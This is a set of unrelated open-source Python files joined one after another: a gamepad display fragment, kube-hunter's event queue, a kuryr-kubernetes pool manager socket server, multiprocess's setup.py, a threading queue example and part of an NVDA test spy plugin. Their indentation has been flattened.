dpg.set_value("pad_Ry", -(r_short_data_disp[82]&0x00ff & 0b10000000) | (r_short_data_disp[82]&0x00ff & 0b01111111))
padl2val = -(r_short_data_disp[83]>>8&0x00ff & 0b10000000) | (r_short_data_disp[83]>>8&0x00ff & 0b01111111)
if (padl2val<0):
padl2val = 256+padl2val
if (r_short_data_disp[80]&256==0):
padl2val = 0
dpg.set_value("pad_L2v", padl2val)
padR2val = -(r_short_data_disp[83]&0x00ff & 0b10000000) | (r_short_data_disp[83]&0x00ff & 0b01111111)
if (padR2val<0):
padR2val = 256+padR2val
if (r_short_data_disp[80]&512==0):
padR2val = 0
dpg.set_value("pad_R2v", padR2val)
dpg.render_dearpygui_frame()
dpg.destroy_context()
if __name__ == '__main__':
thread1 = threading.Thread(target=dpgrun)
thread1.start()
main()
#try:
# joint_publisher_func()
#except rospy.ROSInterruptException:
# pass
|
handler.py
|
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
config = get_config()
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in self.filters[event]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
config = get_config()
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
|
pool.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler
from six.moves.socketserver import ThreadingUnixStreamServer
from neutronclient.common import exceptions as n_exc
from oslo_config import cfg as oslo_cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr.lib._i18n import _
from kuryr_kubernetes import constants
from kuryr_kubernetes.controller.drivers import base as drivers
LOG = logging.getLogger(__name__)
pool_manager_opts = [
oslo_cfg.StrOpt('sock_file',
help=_("Absolute path to socket file that "
"will be used for communication with "
"the Pool Manager daemon"),
default='/run/kuryr/kuryr_manage.sock'),
]
oslo_cfg.CONF.register_opts(pool_manager_opts, "pool_manager")
class UnixDomainHttpServer(ThreadingUnixStreamServer):
pass
class RequestHandler(BaseHTTPRequestHandler):
protocol = "HTTP/1.0"
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_POPULATE):
trunk_ips = params.get('trunks', None)
num_ports = params.get('num_ports', 1)
if trunk_ips:
try:
self._create_subports(num_ports, trunk_ips)
except Exception:
response = ('Error while populating pool {0} with {1} '
'ports.'.format(trunk_ips, num_ports))
else:
response = ('Ports pool at {0} was populated with {1} '
'ports.'.format(trunk_ips, num_ports))
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Trunk port IP(s) missing.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_FREE):
trunk_ips = params.get('trunks', None)
if not trunk_ips:
pool = "all"
else:
pool = trunk_ips
try:
self._delete_subports(trunk_ips)
except Exception:
response = 'Error freeing ports pool: {0}.'.format(pool)
else:
response = 'Ports pool belonging to {0} was freed.'.format(
pool)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def do_GET(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_LIST):
try:
pools_info = self._list_pools()
except Exception:
response = 'Error listing the pools.'
else:
response = 'Pools:\n{0}'.format(pools_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_SHOW):
raw_key = params.get('pool_key', None)
if len(raw_key) != 3:
response = ('Invalid pool key. Proper format is:\n'
'[trunk_ip, project_id, [security_groups]]\n')
else:
pool_key = (raw_key[0], raw_key[1], tuple(sorted(raw_key[2])))
try:
pool_info = self._show_pool(pool_key)
except Exception:
response = 'Error showing pool: {0}.'.format(pool_key)
else:
response = 'Pool {0} ports are:\n{1}'.format(pool_key,
pool_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def _create_subports(self, num_ports, trunk_ips):
try:
drv_project = drivers.PodProjectDriver.get_instance()
drv_subnets = drivers.PodSubnetsDriver.get_instance()
drv_sg = drivers.PodSecurityGroupsDriver.get_instance()
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
project_id = drv_project.get_project({})
security_groups = drv_sg.get_security_groups({}, project_id)
subnets = drv_subnets.get_subnets([], project_id)
except TypeError:
LOG.error("Invalid driver type")
raise
for trunk_ip in trunk_ips:
try:
drv_vif_pool.force_populate_pool(
trunk_ip, project_id, subnets, security_groups, num_ports)
except n_exc.Conflict:
LOG.error("VLAN Id conflict (already in use) at trunk %s",
trunk_ip)
raise
except n_exc.NeutronClientException:
LOG.exception("Error happened during subports addition at "
"trunk: %s", trunk_ip)
raise
def _delete_subports(self, trunk_ips):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
drv_vif_pool.free_pool(trunk_ips)
except TypeError:
LOG.error("Invalid driver type")
raise
def _list_pools(self):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
available_pools = drv_vif_pool.list_pools()
except TypeError:
LOG.error("Invalid driver type")
raise
pools_info = ""
for pool_key, pool_items in available_pools.items():
pools_info += (jsonutils.dumps(pool_key) + " has "
+ str(len(pool_items)) + " ports\n")
if pools_info:
return pools_info
return "There are no pools"
def _show_pool(self, pool_key):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
pool = drv_vif_pool.show_pool(pool_key)
except TypeError:
LOG.error("Invalid driver type")
raise
if pool:
pool_info = ""
for pool_id in pool:
pool_info += str(pool_id) + "\n"
return pool_info
else:
return "Empty pool"
class PoolManager(object):
"""Manages the ports pool enabling population and free actions.
`PoolManager` runs on the Kuryr-kubernetes controller and allows to
populate specific pools with a given amount of ports. In addition, it also
allows to remove all the (unused) ports in the given pool(s), or from all
of the pool if none of them is specified.
"""
def __init__(self):
pool_manager = threading.Thread(target=self._start_kuryr_manage_daemon)
pool_manager.setDaemon(True)
pool_manager.start()
def _start_kuryr_manage_daemon(self):
LOG.info("Pool manager started")
server_address = oslo_cfg.CONF.pool_manager.sock_file
try:
os.unlink(server_address)
except OSError:
if os.path.exists(server_address):
raise
try:
httpd = UnixDomainHttpServer(server_address, RequestHandler)
httpd.serve_forever()
except KeyboardInterrupt:
pass
except Exception:
LOG.exception('Failed to start Pool Manager.')
httpd.socket.close()
|
setup.py
|
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 2008-2016 California Institute of Technology.
# Copyright (c) 2016-2022 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/multiprocess/blob/master/LICENSE
#
# original code modified from processing/setup.py
# original: Copyright (c) 2006-2008, R Oudkerk
# original: Licence 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/multiprocess/blob/master/COPYING.txt
import re
import os
import sys
import glob
stable_version = '0.70.13'
# drop support for older python
unsupported = None
if sys.version_info < (2, 7):
unsupported = 'Versions of Python before 2.7 are not supported'
elif (3, 0) <= sys.version_info < (3, 6):
unsupported = 'Versions of Python before 3.6 are not supported'
if unsupported:
raise ValueError(unsupported)
is_jython = sys.platform.startswith('java')
is_pypy = hasattr(sys, 'pypy_version_info')
is_py3k = sys.version_info[0] == 3
lt_py33 = sys.version_info < (3, 3)
# the code is version-specific, so get the appropriate root directory
root = 'pypy' if is_pypy else 'py'
pymajor,pyminor = sys.version_info[:2]
pkgdir = '%s%s.%s' % (root,pymajor,pyminor)
if sys.version_info >= (2, 6):
pkgname = 'multiprocess'
else: # (2, 5)
pkgname = 'processing' #XXX: oddity, due to lazyness at the moment
# if sys.version is higher than explicitly supported, try the latest version
HERE = os.path.dirname(os.path.abspath(__file__))
while not os.path.exists(os.path.join(HERE,'%s%s.%s' % (root,pymajor,pyminor))):
pyminor -= 1
if pyminor < 0:
unsupported = 'Python %s is not supported' % pkgdir[len(root):]
raise ValueError(unsupported)
if '%s%s.%s' % (root,pymajor,pyminor) != pkgdir:
msg = 'Warning: Python %s is not currently supported, reverting to %s.%s'
print(msg % (pkgdir[len(root):],pymajor,pyminor))
pkgdir = '%s%s.%s' % (root,pymajor,pyminor)
srcdir = '%s/Modules/_%s' % (pkgdir, pkgname)
libdir = '%s/%s' % (pkgdir, pkgname)
try:
from setuptools import setup, Extension, find_packages
has_setuptools = True
except ImportError:
from distutils.core import setup, Extension # noqa
find_packages = lambda **kwds: [pkgname, pkgname+'.dummy', pkgname+'.tests']
has_setuptools = False
from distutils import sysconfig
from distutils.errors import CCompilerError, DistutilsExecError, \
DistutilsPlatformError
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32' and sys.version_info >= (2, 6):
# distutils.msvc9compiler can raise IOError if the compiler is missing
ext_errors += (IOError, )
BUILD_WARNING = """
-----------------------------------------------------------------------
WARNING: The C extensions could not be compiled
-----------------------------------------------------------------------
Maybe you do not have a C compiler installed on this system?
The reason was:
%s
This is just a warning as most of the functionality will work even
without the updated C extension. It will simply fallback to the
built-in _multiprocessing module. Most notably you will not be able to use
FORCE_EXECV on POSIX systems. If this is a problem for you then please
install a C compiler or fix the error(s) above.
-----------------------------------------------------------------------
"""
# -*- extra config (setuptools) -*-
if has_setuptools:
extras = dict(install_requires=['dill>=0.3.4'])
else:
extras = dict()
# -*- Distribution Meta -*-
here = os.path.abspath(os.path.dirname(__file__))
meta_fh = open(os.path.join(here, '%s/__init__.py' % libdir))
try:
meta = {}
for line in meta_fh:
if line.startswith('__version__'):
version = line.split()[-1].strip("'").strip('"')
break
meta['version'] = version
finally:
meta_fh.close()
#
# Macros and libraries
#
# The `macros` dict determines the macros that will be defined when
# the C extension is compiled. Each value should be either 0 or 1.
# (An undefined macro is assumed to have value 0.) `macros` is only
# used on Unix platforms.
#
# The `libraries` dict determines the libraries to which the C
# extension will be linked. This should probably be either `['rt']`
# if you need `librt` or else `[]`.
#
# Meaning of macros
#
# HAVE_SEM_OPEN
# Set this to 1 if you have `sem_open()`. This enables the use of
# posix named semaphores which are necessary for the
# implementation of the synchronization primitives on Unix. If
# set to 0 then the only way to create synchronization primitives
# will be via a manager (e.g. "m = Manager(); lock = m.Lock()").
#
# HAVE_SEM_TIMEDWAIT
# Set this to 1 if you have `sem_timedwait()`. Otherwise polling
# will be necessary when waiting on a semaphore using a timeout.
#
# HAVE_FD_TRANSFER
# Set this to 1 to compile functions for transferring file
# descriptors between processes over an AF_UNIX socket using a
# control message with type SCM_RIGHTS. On Unix the pickling of
# of socket and connection objects depends on this feature.
#
# If you get errors about missing CMSG_* macros then you should
# set this to 0.
#
# HAVE_BROKEN_SEM_GETVALUE
# Set to 1 if `sem_getvalue()` does not work or is unavailable.
# On Mac OSX it seems to return -1 with message "[Errno 78]
# Function not implemented".
#
# HAVE_BROKEN_SEM_UNLINK
# Set to 1 if `sem_unlink()` is unnecessary. For some reason this
# seems to be the case on Cygwin where `sem_unlink()` is missing
# from semaphore.h.
#
if sys.platform == 'win32': # Windows
macros = dict()
libraries = ['ws2_32']
elif sys.platform.startswith('darwin'): # Mac OSX
macros = dict(
HAVE_SEM_OPEN=1,
HAVE_SEM_TIMEDWAIT=0,
HAVE_FD_TRANSFER=1,
HAVE_BROKEN_SEM_GETVALUE=1
)
libraries = []
elif sys.platform.startswith('cygwin'): # Cygwin
macros = dict(
HAVE_SEM_OPEN=1,
HAVE_SEM_TIMEDWAIT=1,
HAVE_FD_TRANSFER=0,
HAVE_BROKEN_SEM_UNLINK=1
)
libraries = []
elif sys.platform in ('freebsd4', 'freebsd5', 'freebsd6'):
# FreeBSD's P1003.1b semaphore support is very experimental
# and has many known problems. (as of June 2008)
macros = dict( # FreeBSD 4-6
HAVE_SEM_OPEN=0,
HAVE_SEM_TIMEDWAIT=0,
HAVE_FD_TRANSFER=1,
)
libraries = []
elif re.match('^(gnukfreebsd(8|9|10|11)|freebsd(7|8|9|10))', sys.platform):
macros = dict( # FreeBSD 7+ and GNU/kFreeBSD 8+
HAVE_SEM_OPEN=bool(
sysconfig.get_config_var('HAVE_SEM_OPEN') and not
bool(sysconfig.get_config_var('POSIX_SEMAPHORES_NOT_ENABLED'))
),
HAVE_SEM_TIMEDWAIT=1,
HAVE_FD_TRANSFER=1,
)
libraries = []
elif sys.platform.startswith('openbsd'):
macros = dict( # OpenBSD
HAVE_SEM_OPEN=0, # Not implemented
HAVE_SEM_TIMEDWAIT=0,
HAVE_FD_TRANSFER=1,
)
libraries = []
else: # Linux and other unices
macros = dict(
HAVE_SEM_OPEN=1,
HAVE_SEM_TIMEDWAIT=1,
HAVE_FD_TRANSFER=1,
)
libraries = ['rt']
if sys.platform == 'win32':
multiprocessing_srcs = [
'%s/%s.c' % (srcdir, pkgname),
'%s/semaphore.c' % srcdir,
]
if lt_py33:
multiprocessing_srcs += [
'%s/pipe_connection.c' % srcdir,
'%s/socket_connection.c' % srcdir,
'%s/win32_functions.c' % srcdir,
]
else:
multiprocessing_srcs = [ '%s/%s.c' % (srcdir, pkgname) ]
if lt_py33:
multiprocessing_srcs.append('%s/socket_connection.c' % srcdir)
if macros.get('HAVE_SEM_OPEN', False):
multiprocessing_srcs.append('%s/semaphore.c' % srcdir)
long_description = \
'''-----------------------------------------------------------------
multiprocess: better multiprocessing and multithreading in python
-----------------------------------------------------------------
About Multiprocess
====================
``multiprocess`` is a fork of ``multiprocessing``, and is developed as part of ``pathos``:
https://github.com/uqfoundation/pathos
``multiprocessing`` is a package for the Python language which supports the
spawning of processes using the API of the standard library's
``threading`` module. ``multiprocessing`` has been distributed in the standard
library since python 2.6.
Features:
- Objects can be transferred between processes using pipes or multi-producer/multi-consumer queues.
- Objects can be shared between processes using a server process or (for simple data) shared memory.
- Equivalents of all the synchronization primitives in ``threading`` are available.
- A ``Pool`` class makes it easy to submit tasks to a pool of worker processes.
``multiprocess`` is part of ``pathos``, a python framework for heterogeneous computing.
``multiprocess`` is in active development, so any user feedback, bug reports, comments,
or suggestions are highly appreciated. A list of issues is located at https://github.com/uqfoundation/multiprocess/issues, with a legacy list maintained at https://uqfoundation.github.io/project/pathos/query.
NOTE: A C compiler is required to build the included extension module. For python 3.3 and above, a C compiler is suggested, but not required.
Major Changes
==============
- enhanced serialization, using ``dill``
Current Release
===============
This documentation is for version ``multiprocess-%(thisver)s`` (a fork of ``multiprocessing-0.70a1``).
The latest released version of ``multiprocess`` is available from::
https://pypi.org/project/multiprocess
``Multiprocessing`` is distributed under a BSD license.
Development Version
===================
You can get the latest development version with all the shiny new features at::
https://github.com/uqfoundation
If you have a new contribution, please submit a pull request.
Installation
============
``multiprocess`` is packaged to install from source, so you must
download the tarball, unzip, and run the installer::
[download]
$ tar -xvzf multiprocess-%(relver)s.tgz
$ cd multiprocess-%(relver)s
$ python setup.py build
$ python setup.py install
You will be warned of any missing dependencies and/or settings
after you run the "build" step above.
Alternately, ``multiprocess`` can be installed with ``pip`` or ``easy_install``::
$ pip install multiprocess
NOTE: A C compiler is required to build the included extension module from source. For python 3.3 and above, a C compiler is suggested, but not required. Binary installs do not require a C compiler.
Requirements
============
``multiprocess`` requires::
- ``python``, **version == 2.7** or **version >= 3.6**, or ``pypy``
- ``dill``, **version >= 0.3.4**
Optional requirements::
- ``setuptools``, **version >= 40.6.0**
Basic Usage
===========
The ``multiprocess.Process`` class follows the API of ``threading.Thread``.
For example ::
from multiprocess import Process, Queue
def f(q):
q.put('hello world')
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=[q])
p.start()
print (q.get())
p.join()
Synchronization primitives like locks, semaphores and conditions are
available, for example ::
>>> from multiprocess import Condition
>>> c = Condition()
>>> print (c)
<Condition(<RLock(None, 0)>), 0>
>>> c.acquire()
True
>>> print (c)
<Condition(<RLock(MainProcess, 1)>), 0>
One can also use a manager to create shared objects either in shared
memory or in a server process, for example ::
>>> from multiprocess import Manager
>>> manager = Manager()
>>> l = manager.list(range(10))
>>> l.reverse()
>>> print (l)
[9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
>>> print (repr(l))
<Proxy[list] object at 0x00E1B3B0>
Tasks can be offloaded to a pool of worker processes in various ways,
for example ::
>>> from multiprocess import Pool
>>> def f(x): return x*x
...
>>> p = Pool(4)
>>> result = p.map_async(f, range(10))
>>> print (result.get(timeout=1))
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
When ``dill`` is installed, serialization is extended to most objects,
for example ::
>>> from multiprocess import Pool
>>> p = Pool(4)
>>> print (p.map(lambda x: (lambda y:y**2)(x) + x, xrange(10)))
[0, 2, 6, 12, 20, 30, 42, 56, 72, 90]
More Information
================
Probably the best way to get started is to look at the documentation at
http://multiprocess.rtfd.io. See ``multiprocess.examples`` for a set of example
scripts. You can also run the test suite with ``python -m multiprocess.tests``.
Please feel free to submit a ticket on github, or ask a question on
stackoverflow (**@Mike McKerns**). If you would like to share how you use
``multiprocess`` in your work, please post send an email
(to **mmckerns at uqfoundation dot org**).
Citation
========
If you use ``multiprocess`` to do research that leads to publication, we ask that you
acknowledge use of ``multiprocess`` by citing the following in your publication::
M.M. McKerns, L. Strand, T. Sullivan, A. Fang, M.A.G. Aivazis,
"Building a framework for predictive science", Proceedings of
the 10th Python in Science Conference, 2011;
http://arxiv.org/pdf/1202.1056
Michael McKerns and Michael Aivazis,
"pathos: a framework for heterogeneous computing", 2010- ;
https://uqfoundation.github.io/project/pathos
Please see https://uqfoundation.github.io/project/pathos or
http://arxiv.org/pdf/1202.1056 for further information.
''' % {'relver': stable_version, 'thisver': stable_version}
#long_description = open(os.path.join(HERE, 'README.md')).read()
#long_description += """
#
#===========
#Changes
#===========
#
#"""
#long_description += open(os.path.join(HERE, 'CHANGES.txt')).read()
#if not is_py3k:
# long_description = long_description.encode('ascii', 'replace')
# -*- Installation Requires -*-
#py_version = sys.version_info
#is_jython = sys.platform.startswith('java')
#is_pypy = hasattr(sys, 'pypy_version_info')
#def strip_comments(l):
# return l.split('#', 1)[0].strip()
#
#def reqs(f):
# return list(filter(None, [strip_comments(l) for l in open(
# os.path.join(os.getcwd(), 'requirements', f)).readlines()]))
#
#if py_version[0] == 3:
# tests_require = reqs('test3.txt')
#else:
# tests_require = reqs('test.txt')
def _is_build_command(argv=sys.argv, cmds=('install', 'build', 'bdist')):
for arg in argv:
if arg.startswith(cmds):
return arg
def run_setup(with_extensions=True):
extensions = []
if with_extensions:
extensions = [
Extension(
'_%s' % pkgname,
sources=multiprocessing_srcs,
define_macros=list(macros.items()),
libraries=libraries,
include_dirs=[srcdir],
depends=glob.glob('%s/*.h' % srcdir) + ['setup.py'],
),
]
packages = find_packages(
where=pkgdir,
exclude=['ez_setup', 'examples', 'doc',],
)
config = dict(
name='multiprocess',
version=meta['version'],
description=('better multiprocessing and multithreading in python'),
long_description=long_description,
packages=packages,
ext_modules=extensions,
author='Mike McKerns',
maintainer='Mike McKerns',
url='https://github.com/uqfoundation/multiprocess',
download_url='https://github.com/uqfoundation/multiprocess/releases/download/multiprocess-%s/multiprocess-%s.tar.gz' % (stable_version, stable_version),
zip_safe=False,
license='BSD',
package_dir={'': pkgdir},
# tests_require=tests_require,
# test_suite='nose.collector',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
],
**extras
)
setup(**config)
try:
run_setup(not (is_jython or is_pypy) and lt_py33)
except BaseException:
if _is_build_command(sys.argv): #XXX: skip WARNING if is_pypy?
import traceback
msg = BUILD_WARNING % '\n'.join(traceback.format_stack())
if not is_py3k:
exec('print >> sys.stderr, msg')
else:
exec('print(msg, file=sys.stderr)')
run_setup(False)
else:
raise
|
inter_thread_communication_queue.py
|
import sys
import threading
import queue
# sentinel object is anything that indicates a stop on the task
# you could use None as a sentinel, indeed IMO that is what is used the most of the times
import time
sentinel = object()
def order_work(q):
for i in range(0, 10):
q.put(i)
time.sleep(1)
q.put(sentinel)
def do_work(q):
while True:
value = q.get()
if value is sentinel:
sys.stdout.write("\nexiting\n")
return
sys.stdout.write(str(value))
q = queue.Queue()
t1 = threading.Thread(target=do_work, args=(q,))
t2 = threading.Thread(target=order_work, args=(q,))
t1.start()
t2.start()
|
speechSpyGlobalPlugin.py
|
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2018 NV Access Limited
# This file may be used under the terms of the GNU General Public License, version 2 or later.
# For more details see: https://www.gnu.org/licenses/gpl-2.0.html
"""This module provides an NVDA global plugin which creates a and robot library remote server.
It allows tests to get information out of NVDA.
It is copied into the (system test specific) NVDA profile directory. It becomes the '__init__.py' file as part
of a package.
"""
import gettext
import typing
from typing import Optional
import extensionPoints
import globalPluginHandler
import threading
from .blockUntilConditionMet import _blockUntilConditionMet
from logHandler import log
from time import perf_counter as _timer
from keyboardHandler import KeyboardInputGesture
import inputCore
import queueHandler
import watchdog
import ctypes
import sys
import os
def _importRobotRemoteServer() -> typing.Type:
log.debug(f"before path mod: {sys.path}")
# Get the path to the top of the package
TOP_DIR = os.path.abspath(os.path.dirname(__file__))
# imports that require libraries not distributed with an install of NVDA
sys.path.append(os.path.join(TOP_DIR, "libs"))
log.debug(f"after path mod: {sys.path}")
from robotremoteserver import RobotRemoteServer
return RobotRemoteServer
class BrailleViewerSpy:
postBrailleUpdate = extensionPoints.Action()
def __init__(self):
self._last = ""
def updateBrailleDisplayed(
self,
cells, # ignored
rawText,
currentCellCount, # ignored
):
rawText = rawText.strip()
if rawText and rawText != self._last:
self._last = rawText
self.postBrailleUpdate.notify(rawText=rawText)
isDestroyed: bool = False
def saveInfoAndDestroy(self):
if not self.isDestroyed:
self.isDestroyed = True
import brailleViewer
brailleViewer._onGuiDestroyed()
class NVDASpyLib:
""" Robot Framework Library to spy on NVDA during system tests.
Used to determine if NVDA has finished starting, and various ways of getting speech output.
All public methods are part of the Robot Library
"""
SPEECH_HAS_FINISHED_SECONDS: float = 0.5
def __init__(self):
# speech cache is ordered temporally, oldest at low indexes, most recent at highest index.
self._nvdaSpeech_requiresLock = [ # requires thread locking before read/write
[""], # initialise with an empty string, this allows for access via [-1]. This is equiv to no speech.
]
self._lastSpeechTime_requiresLock = _timer()
#: Lock to protect members that are written to in _onNvdaSpeech.
self._speechLock = threading.RLock()
# braille raw text (not dots) cache is ordered temporally,
# oldest at low indexes, most recent at highest index.
self._nvdaBraille_requiresLock = [ # requires thread locking before read/write
"", # initialise with an empty string, this allows for access via [-1]. This is equiv to no braille.
]
#: Lock to protect members that are written to in _onNvdaBraille.
self._brailleLock = threading.RLock()
self._isNvdaStartupComplete = False
self._allSpeechStartIndex = self.get_last_speech_index()
self._allBrailleStartIndex = self.get_last_braille_index()
self._maxKeywordDuration = 30
self._registerWithExtensionPoints()
def _registerWithExtensionPoints(self):
from core import postNvdaStartup
postNvdaStartup.register(self._onNvdaStartupComplete)
# This file (`speechSpyGlobalPlugin.py`) is moved to
# "scratchpad/globalPlugins/speechSpyGlobalPlugin/__init__.py"
# Import path must be valid after `speechSpySynthDriver.py` is moved to "scratchpad/synthDrivers/"
from synthDrivers.speechSpySynthDriver import post_speech
post_speech.register(self._onNvdaSpeech)
self._brailleSpy = BrailleViewerSpy()
self._brailleSpy.postBrailleUpdate.register(self._onNvdaBraille)
def set_configValue(self, keyPath: typing.List[str], val: typing.Union[str, bool, int]):
import config
if not keyPath or len(keyPath) < 1:
raise ValueError("Key path not provided")
penultimateConf = config.conf
for key in keyPath[:-1]:
penultimateConf = penultimateConf[key]
ultimateKey = keyPath[-1]
penultimateConf[ultimateKey] = val
fakeTranslations: typing.Optional[gettext.NullTranslations] = None
def override_translationString(self, invariantString: str, replacementString: str):
import languageHandler
if not self.fakeTranslations:
class Translation_Fake(gettext.NullTranslations):
originalTranslationFunction: Optional
translationResults: typing.Dict[str, str]
def __init__(
self,
originalTranslationFunction: Optional
):
self.originalTranslationFunction = originalTranslationFunction
self.translationResults = {}
super().__init__()
self.install()
def gettext(self, msg: str) -> str:
if msg in self.translationResults:
return self.translationResults[msg]
if self.originalTranslationFunction:
return self.originalTranslationFunction.gettext(msg)
return msg
def restore(self) -> None:
self.translationResults.clear()
if self.originalTranslationFunction:
self.originalTranslationFunction.install()
self.fakeTranslations = Translation_Fake(
languageHandler.installedTranslation() if languageHandler.installedTranslation else None
)
self.fakeTranslations.translationResults[invariantString] = replacementString
def queueNVDAMainThreadCrash(self):
from queueHandler import queueFunction, eventQueue
queueFunction(eventQueue, _crashNVDA)
def queueNVDABrailleThreadCrash(self):
from braille import _BgThread
_BgThread.queueApc(ctypes.windll.Kernel32.DebugBreak)
def queueNVDAUIAHandlerThreadCrash(self):
from UIAHandler import handler
handler.MTAThreadQueue.put(_crashNVDA)
# callbacks for extension points
def _onNvdaStartupComplete(self):
self._isNvdaStartupComplete = True
import brailleViewer
brailleViewer._brailleGui = self._brailleSpy
self.setBrailleCellCount(120)
brailleViewer.postBrailleViewerToolToggledAction.notify(created=True)
def _onNvdaBraille(self, rawText: str):
if not rawText:
return
if not isinstance(rawText, str):
raise TypeError(f"rawText expected as str, got: {type(rawText)}, {rawText!r}")
with self._brailleLock:
self._nvdaBraille_requiresLock.append(rawText)
